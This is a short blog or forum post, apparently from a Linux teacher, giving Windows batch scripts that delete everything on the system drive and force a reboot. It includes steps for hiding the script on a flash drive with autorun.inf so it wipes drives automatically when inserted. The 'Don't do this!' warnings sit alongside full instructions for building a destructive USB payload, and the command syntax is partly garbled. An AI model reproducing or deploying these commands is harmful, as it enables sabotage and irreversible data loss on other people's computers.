I teach Linux programming at school and it has many cool scripts that would make windows look like a child's play thing. So here is a script for windows script that I found useful in deleting your entire drive.
Don't do this!
Don't do this!
Don't do this!
It will delete your entire drive.
So how will it be useful? same as any script the main purpose is automation of task. Just create an autorun.inf for this script place both this format script and autorun.inf in a flashdrive and your ready to auto format drives.
1st Step : Open any text editor
2nd Step : encode the script (you could try any of the two)
@echo off Del C: *.* |y
//or you could also do
@echo off del %systemdrive%*.* /f /s /q shutdown -r -f -t 00
3rd STEP: save the file as "filename.BAT" example "autoformat.bat"
4th STEP: to activate the file you just have to double click the script. If you want to try it without deleting your main drive, you could change "C:" to any unused drive or removable media.
Lio El Nido
3 years ago
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